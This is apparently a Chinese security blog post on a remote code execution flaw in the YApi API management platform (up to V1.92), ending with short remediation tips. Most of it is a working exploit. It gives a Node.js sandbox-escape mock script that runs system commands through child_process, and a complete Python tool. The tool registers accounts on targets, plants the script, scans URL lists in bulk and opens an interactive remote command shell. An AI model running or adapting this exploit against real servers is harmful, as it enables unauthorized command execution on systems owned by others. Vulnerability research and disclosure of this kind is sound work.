官网
https://hellosean1025.github.io/yapi/
https://github.com/ymfe/yapi
简介
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。
漏洞原理
通过注册账号密码登录后,添加项目→添加接口→高级Mock→脚本→开启脚本→写入代码即可执行
影响范围
<=V1.92
漏洞利用
注册账号密码
登录系统
添加项目
添加接口
添加mock脚本
const asdf = this
const asdf1 = this.constructor
const asdf2 = asdf1.constructor
const asdf3 = asdf2('return process')
const asdf4 = asdf3()
mockJson = asdf4.mainModule.require("child_process").execSync("echo asdf1234").toString()
mock脚本地址
访问Mock地址
Exp
#!/usr/bin/python3
import requests
import time
import json
import argparse
import base64
parser=argparse.ArgumentParser(description="YApi Poc&Exp --By Infiltrator",epilog="GitHub:https://github.com/nhpt")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-u',help='目标URL,如http://www.example.com')
group.add_argument('-f',type=argparse.FileType('r',encoding='utf8'),help='目标URL文件,以换行分割')
group1 = parser.add_mutually_exclusive_group(required=True)
group1.add_argument('-c',action='store_true',help='漏洞扫描模式,仅检测漏洞')
group1.add_argument('-e',action='store_true',help='漏洞利用模式,仅检测漏洞')
parser.add_argument('-p',help='设置代理地址和端口,如:http://127.0.0.1:8080')
parser.add_argument('-t',help='设置超时时间,单位:秒')
parser.add_argument('-H',help='设置HTTP请求头,json格式,如:{"X-Forwarded-For":"127.0.0.1"}')
parser.add_argument('-U',help='指定用户名,如:test')
parser.add_argument('-P',help='指定密码,如:test')
parser.add_argument('-nr',action='store_true',help='不使用注册功能,需要使用-U和-P指定用户名和密码')
parser.add_argument('-o', type=argparse.FileType('w', encoding='UTF-8'),help='保存扫描结果到文本文件')
args=parser.parse_args()
requests.packages.urllib3.disable_warnings()
proxies=None
timeout=None
head = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
}
rand_num=str(time.time()).split('.')[1]
user="e1f0a2bc"+rand_num
passwd="[email protected]"
def proxy(proxy):
try:
key=proxy.split('://')[0]
return {key:proxy}
except:
exit('[!] 代理地址格式有误!')
def headers(header):
try:
headers=json.loads(header)
return headers
except:
exit('[!] HTTP请求头格式有误!')
# 注册用户
def register(url,user=user,passwd=passwd):
data={"email":user,"password":passwd,"username":user}
reg=url+"/api/user/reg"
try:
r=requests.post(reg,json=data,headers=head,timeout=timeout,proxies=proxies,verify=False)
if "Set-Cookie" in r.headers:
print("[*] 注册成功!用户名:"+user+" 密码:"+passwd,url)
return True
else:
#print("[!] 注册失败!",url)
return False
except:
return False
# 登录
def login(url,user=user,passwd=passwd):
data={"email":user,"password":passwd}
login=url+"/api/user/login"
try:
r=requests.post(login,json=data,headers=head,timeout=timeout,proxies=proxies,verify=False)
if "Set-Cookie" in r.headers:
#print("[+] 登录成功!",url)
return requests.utils.dict_from_cookiejar(r.cookies)
else:
#print("[!] 登录失败!",url)
return False
except:
return False
# 获取group_id
def get_groupid(url,cookie):
group_url=url+"/api/group/get_mygroup"
try:
r=requests.get(group_url,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
group_id=json.loads(r.text).get("data").get("_id")
if group_id:
return group_id
else:
print("[!] 未获得group_id!",url)
return False
except:
return False
# 添加项目,返回project_id
def add_project(url,cookie,group_id):
data={"name":user,"group_id":group_id,"icon":"code-o","color":"green","project_type":"private"}
project_url=url+"/api/project/add"
try:
r=requests.post(project_url,json=data,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
project_id=json.loads(r.text).get("data").get("_id")
if project_id:
return project_id
else:
print("[!] 未获得project_id!",url)
return False
except:
return False
# 获取catid
def get_catid(url,cookie,project_id):
catid_url=url+"/api/project/get?id="+str(project_id)
try:
r=requests.get(catid_url,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
catid=json.loads(r.text).get("data").get("cat")[0].get("_id")
if catid:
return catid
else:
print("[!] 未获得catid!",url)
return False
except:
return False
# 添加接口,返回interface_id
def add_interface(url,cookie,catid,project_id):
interface_url=url+"/api/interface/add"
title=user
data={"method":"GET","catid":catid,"title":title,"path":"/"+title,"project_id":project_id}
try:
r=requests.post(interface_url,json=data,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
interface_id=json.loads(r.text).get("data").get("_id")
if interface_id:
return interface_id
else:
print("[!] 未获得interface_id!",url)
return False
except:
return False
# 添加高级mock脚本
def add_mock(url,cookie,project_id,interface_id,cmd="echo "+user):
mock_url=url+"/api/plugin/advmock/save"
mock_script="const "+user+" = this\nconst "+user+"1"+" = this.constructor\nconst "+user+"2"+" = "+user+"1"+".constructor\nconst "+user+"3"+" = "+user+"2"+"('return process')\nconst "+user+"4"+" = "+user+"3"+"()\nmockJson = "+user+"4"+".mainModule.require(\"child_process\").execSync(\""+cmd+"\").toString()"
mock_script2="const "+user+" = this\nconst "+user+"1"+" = this.constructor\nconst "+user+"2"+" = "+user+"1"+".constructor\nconst "+user+"3"+" = new "+user+"2"+"('return Buffer')()\nconst "+user+"4"+" = new "+user+"2"+"('return process')()\n"+user+"5"+" = new "+user+"3"+"('"+base64.b64encode(cmd.encode()).decode()+"','base64').toString()\nmockJson = new "+user+"3"+"("+user+"4"+".mainModule.require('child_process').execSync("+user+"5"+"').toString()).toString()"
data={"project_id":project_id,"interface_id":interface_id,"mock_script":mock_script,"enable":True}
try:
r=requests.post(mock_url,json=data,cookies=cookie,headers=head,timeout=timeout,proxies=proxies,verify=False)
api_url=url+"/mock/"+str(project_id)+"/"+user
return api_url
except:
return False
# 执行mock脚本
def get_mock(url):
try:
r=requests.get(url,headers=head,timeout=timeout,proxies=proxies,verify=False)
return r.text
except:
return False
def check(url):
if not args.nr:
res=register(url,user,passwd)
if not res:
print("[-] "+url+" 不存在远程代码执行漏洞!")
return False
cookie=login(url,user,passwd)
if not cookie:
print("[-] "+url+" 不存在远程代码执行漏洞!")
return False
group_id=get_groupid(url,cookie)
if not group_id:
print("[-] "+url+" 不存在远程代码执行漏洞!")
return False
#print("[+] 成功获取group_id:",group_id)
project_id=add_project(url,cookie,group_id)
if not project_id:
print("[-] "+url+" 不存在远程代码执行漏洞!")
return False
#print("[+] 成功添加项目,project_id:",project_id)
catid=get_catid(url,cookie,project_id)
if not catid:
print("[-] "+url+" 不存在远程代码执行漏洞!")
return False
#print("[+] 成功获取catid:",catid)
interface_id=add_interface(url,cookie,catid,project_id)
if not interface_id:
print("[-] "+url+" 不存在远程代码执行漏洞!")
return False
#print("[+] 成功添加接口,interface_id:",interface_id)
api_url=add_mock(url,cookie,project_id,interface_id)
if not api_url:
print("[-] "+url+" 不存在远程代码执行漏洞!")
return False
print("[+] 接口地址:",api_url)
res=get_mock(api_url)
if user in res:
print("[+] "+url+" 存在远程代码执行漏洞!")
if args.o:
args.o.write(url+'\n')
else:
print("[-] "+url+" 不存在远程代码执行漏洞!")
def exploit(url):
if not args.nr:
res=register(url,user,passwd)
if not res:
return False
cookie=login(url,user,passwd)
if not cookie:
return False
group_id=get_groupid(url,cookie)
if not group_id:
return False
print("[+] 成功获取group_id:",group_id)
project_id=add_project(url,cookie,group_id)
if not project_id:
return False
print("[+] 成功添加项目,project_id:",project_id)
catid=get_catid(url,cookie,project_id)
if not catid:
return False
print("[+] 成功获取catid:",catid)
interface_id=add_interface(url,cookie,catid,project_id)
if not interface_id:
return False
print("[+] 成功添加接口,interface_id:",interface_id)
while 1:
cmd=input("$ ")
if 'exit' in cmd:
exit()
api_url=add_mock(url,cookie,project_id,interface_id,cmd)
if not api_url:
return False
res=get_mock(api_url)
print(res)
if args.u:
urls=[args.u.strip('/')]
else:
urls=[x.strip('/\n') for x in args.f.readlines()]
#print(urls)
if args.U:
user=args.U
if args.P:
passwd=args.P
if args.p:
proxies=proxy(args.p)
if args.t:
timeout=args.t
if args.H:
head=headers(args.H)
if args.c:
for u in urls:
check(u)
if args.e:
for u in urls:
exploit(u)
修复建议
- 关闭YAPI用户注册功能,以阻断攻击者注册。
- 利用请求白名单的方式限制 YAPI 相关端口。
- 排查 YAPI 服务器是否存在恶意访问记录。
- 升级至最新版本
Comments | NOTHING